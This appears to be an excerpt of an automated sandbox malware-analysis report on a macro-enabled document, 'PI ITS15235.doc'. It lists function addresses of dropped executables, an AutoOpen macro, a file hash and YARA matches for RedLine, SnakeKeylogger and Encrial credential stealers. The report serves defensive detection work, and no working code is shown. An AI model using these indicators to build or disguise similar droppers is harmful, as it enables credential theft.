Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74E9B8	10_2_2F74E9B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74B7B8	10_2_2F74B7B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74CD98	10_2_2F74CD98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F749B98	10_2_2F749B98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F749B8F	10_2_2F749B8F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74FC78	10_2_2F74FC78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74CA78	10_2_2F74CA78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F749878	10_2_2F749878
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74FC68	10_2_2F74FC68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74E058	10_2_2F74E058
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F747C58	10_2_2F747C58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74AE58	10_2_2F74AE58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F740040	10_2_2F740040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74F638	10_2_2F74F638
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F749238	10_2_2F749238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74C438	10_2_2F74C438
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74F629	10_2_2F74F629
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74C42B	10_2_2F74C42B
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74DA18	10_2_2F74DA18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74A818	10_2_2F74A818
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F740007	10_2_2F740007
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F747608	10_2_2F747608
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74D6F8	10_2_2F74D6F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74A4F8	10_2_2F74A4F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7404FA	10_2_2F7404FA
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7488D8	10_2_2F7488D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74BAD8	10_2_2F74BAD8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74ECC8	10_2_2F74ECC8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F749EB8	10_2_2F749EB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74D0B8	10_2_2F74D0B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74D0A8	10_2_2F74D0A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74E698	10_2_2F74E698
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F748298	10_2_2F748298
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74B498	10_2_2F74B498
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F740E87	10_2_2F740E87
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F74B488	10_2_2F74B488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F756440	10_2_2F756440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F75CA90	10_2_2F75CA90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F757170	10_2_2F757170
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F753560	10_2_2F753560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F750360	10_2_2F750360
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F754B40	10_2_2F754B40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F751940	10_2_2F751940
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F75034F	10_2_2F75034F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F756120	10_2_2F756120
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F752F20	10_2_2F752F20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F754500	10_2_2F754500
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F751300	10_2_2F751300
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7541E0	10_2_2F7541E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F750FE0	10_2_2F750FE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7557C0	10_2_2F7557C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7525C0	10_2_2F7525C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F75E1C8	10_2_2F75E1C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F75E1B8	10_2_2F75E1B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F753BA0	10_2_2F753BA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7509A0	10_2_2F7509A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F750991	10_2_2F750991
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F755180	10_2_2F755180
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F751F80	10_2_2F751F80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F754E60	10_2_2F754E60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F751C60	10_2_2F751C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F753240	10_2_2F753240
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F750040	10_2_2F750040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F754820	10_2_2F754820
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F751620	10_2_2F751620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F75F428	10_2_2F75F428
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F75F418	10_2_2F75F418
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F750007	10_2_2F750007
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F752C00	10_2_2F752C00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F755E00	10_2_2F755E00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F75E0FB	10_2_2F75E0FB
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F755AE0	10_2_2F755AE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7528E0	10_2_2F7528E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F756EEB	10_2_2F756EEB
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7528D0	10_2_2F7528D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F753EC0	10_2_2F753EC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F750CC0	10_2_2F750CC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7554A0	10_2_2F7554A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7522A0	10_2_2F7522A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F753880	10_2_2F753880
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F750680	10_2_2F750680
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F762DB0	10_2_2F762DB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F760AB8	10_2_2F760AB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7626B0	10_2_2F7626B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7603B8	10_2_2F7603B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F761FB0	10_2_2F761FB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7618B0	10_2_2F7618B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F763689	10_2_2F763689
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7611B0	10_2_2F7611B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F765197	10_2_2F765197
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F762DA1	10_2_2F762DA1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F760AA8	10_2_2F760AA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7626A3	10_2_2F7626A3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7603A8	10_2_2F7603A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F760040	10_2_2F760040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F760037	10_2_2F760037
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F760031	10_2_2F760031
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F761FA1	10_2_2F761FA1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7618A3	10_2_2F7618A3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2F7611A0	10_2_2F7611A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2FE2C011	10_2_2FE2C011
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2FE232AC	10_2_2FE232AC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2FE25000	10_2_2FE25000
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_029020C4	13_2_029020C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00408C60	14_2_00408C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_0040DC11	14_2_0040DC11
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00407C3F	14_2_00407C3F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00418CCC	14_2_00418CCC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00406CA0	14_2_00406CA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_004028B0	14_2_004028B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_0041A4BE	14_2_0041A4BE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00408C60	14_2_00408C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00418244	14_2_00418244
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00401650	14_2_00401650
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00402F20	14_2_00402F20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_004193C4	14_2_004193C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00418788	14_2_00418788
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00402F89	14_2_00402F89
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00402B90	14_2_00402B90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_004073A0	14_2_004073A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_212E1560	14_2_212E1560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_212E154F	14_2_212E154F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_212E12B0	14_2_212E12B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_212E12C0	14_2_212E12C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441D490	14_2_2441D490
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441B4BF	14_2_2441B4BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441B7A2	14_2_2441B7A2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441F0C9	14_2_2441F0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441B1E1	14_2_2441B1E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_244141E1	14_2_244141E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441BD5F	14_2_2441BD5F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441AF00	14_2_2441AF00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_24418F18	14_2_24418F18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_24415FA8	14_2_24415FA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441AA58	14_2_2441AA58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441BA81	14_2_2441BA81
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441D481	14_2_2441D481
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441E5D8	14_2_2441E5D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441E5E8	14_2_2441E5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_24413355	14_2_24413355
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_244133B5	14_2_244133B5
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_2441AC20	14_2_2441AC20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D8550	14_2_255D8550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D3508	14_2_255D3508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DB580	14_2_255DB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D0040	14_2_255D0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D7808	14_2_255D7808
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D0738	14_2_255D0738
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D0E38	14_2_255D0E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DE548	14_2_255DE548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D8540	14_2_255D8540
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DB572	14_2_255DB572
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DE53C	14_2_255DE53C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DB9D8	14_2_255DB9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DB9C8	14_2_255DB9C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DEDF8	14_2_255DEDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DEDE9	14_2_255DEDE9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DE991	14_2_255DE991
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DE9A0	14_2_255DE9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DD840	14_2_255DD840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D0006	14_2_255D0006
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DD830	14_2_255DD830
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D34F8	14_2_255D34F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DE0F0	14_2_255DE0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DE0E1	14_2_255DE0E1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DDC98	14_2_255DDC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DDC88	14_2_255DDC88
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D7080	14_2_255D7080
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DFB00	14_2_255DFB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DCB38	14_2_255DCB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D072A	14_2_255D072A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DCB2A	14_2_255DCB2A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DD3DA	14_2_255DD3DA
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DD3E8	14_2_255DD3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DCF90	14_2_255DCF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DCF80	14_2_255DCF80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DF250	14_2_255DF250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DF240	14_2_255DF240
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DC27A	14_2_255DC27A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DBE30	14_2_255DBE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D0E29	14_2_255D0E29
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255D7A28	14_2_255D7A28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DBE20	14_2_255DBE20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DC6D0	14_2_255DC6D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DFAF0	14_2_255DFAF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DC6E0	14_2_255DC6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DF69A	14_2_255DF69A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DC288	14_2_255DC288
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255DF6A8	14_2_255DF6A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_255E3918	14_2_255E3918

Source: PI ITS15235.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen			Name: AutoOpen

Source: PI ITS15235.doc

OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\npratlsN.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C

Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: String function: 0040E1D8 appears 129 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F44DC appears 74 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F4500 appears 34 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 0290889C appears 45 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 02908818 appears 56 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F4860 appears 943 times
Source: C:\Windows\SysWOW64\brightness.exe	Code function: String function: 028F46D4 appears 244 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 02888818 appears 50 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 02904860 appears 677 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 02918818 appears 50 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 028746D4 appears 155 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 029046D4 appears 155 times
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: String function: 02874860 appears 677 times

Source: NETUTILS.dll.4.dr

Static PE information: Number of sections : 19 > 10

Source: 14.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2b489a06.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.brightness.exe.219233d8.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.Nsltarpn.PIF.20fe67a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.23cc0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2e310000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
